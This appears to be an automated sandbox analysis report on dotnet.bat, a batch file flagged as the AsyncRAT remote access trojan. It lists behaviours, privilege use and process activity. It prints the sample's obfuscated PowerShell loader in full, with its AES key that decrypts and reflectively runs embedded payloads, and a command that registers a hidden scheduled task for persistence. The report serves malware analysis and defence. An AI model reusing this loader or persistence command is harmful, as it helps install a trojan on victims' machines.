Malware Analysis Report

2024-10-19 06:56

Sample ID 240627-12dpwstdnh
Target dotnet.bat
SHA256 a6a1b599988d0dddc226b2c2a3780426d84fcccb29de54076f3171131b84560b
Tags
asyncrat winexplomg execution rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a6a1b599988d0dddc226b2c2a3780426d84fcccb29de54076f3171131b84560b

Threat Level: Known bad

The file dotnet.bat was found to be: Known bad.

Malicious Activity Summary

asyncrat winexplomg execution rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-27 22:08

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-27 22:08

Reported

2024-06-27 22:09

Platform

win7-20240611-en

Max time kernel

34s

Max time network

19s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\dotnet.bat"

Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\dotnet.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\dotnet.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\dotnet.bat';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 5).Substring(2))));$RVaAE=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files

memory/1396-2-0x0000000074131000-0x0000000074132000-memory.dmp

memory/1396-3-0x0000000074130000-0x00000000746DB000-memory.dmp

memory/1396-4-0x0000000074130000-0x00000000746DB000-memory.dmp

memory/1396-5-0x0000000074130000-0x00000000746DB000-memory.dmp

memory/1396-6-0x0000000074130000-0x00000000746DB000-memory.dmp

memory/1396-7-0x0000000074130000-0x00000000746DB000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-27 22:08

Reported

2024-06-27 22:09

Platform

win10v2004-20240611-en

Max time kernel

39s

Max time network

39s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dotnet.bat"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Delays execution with timeout.exe

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\timeout.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3676 wrote to memory of 2932 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 3676 wrote to memory of 2932 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2932 wrote to memory of 4896 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2932 wrote to memory of 4896 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2932 wrote to memory of 1916 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2932 wrote to memory of 1916 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2932 wrote to memory of 1916 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 3444 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 3444 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 3444 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 4824 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 4824 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 4824 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 800 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 800 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 800 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 3664 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 3664 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 3664 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 4912 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 4912 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 4912 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 4912 wrote to memory of 4000 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 4912 wrote to memory of 4000 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 4912 wrote to memory of 4000 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 4912 wrote to memory of 464 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4912 wrote to memory of 464 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4912 wrote to memory of 464 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4924 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4924 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4924 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2932 wrote to memory of 3424 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe
PID 2932 wrote to memory of 3424 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe
PID 464 wrote to memory of 4212 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4212 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4212 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4344 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4344 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4344 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dotnet.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\dotnet.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\dotnet.bat';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 5).Substring(2))));$RVaAE=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\dotnet')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 15166' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network15166Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network15166Man.cmd"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network15166Man.cmd"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network15166Man.cmd';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 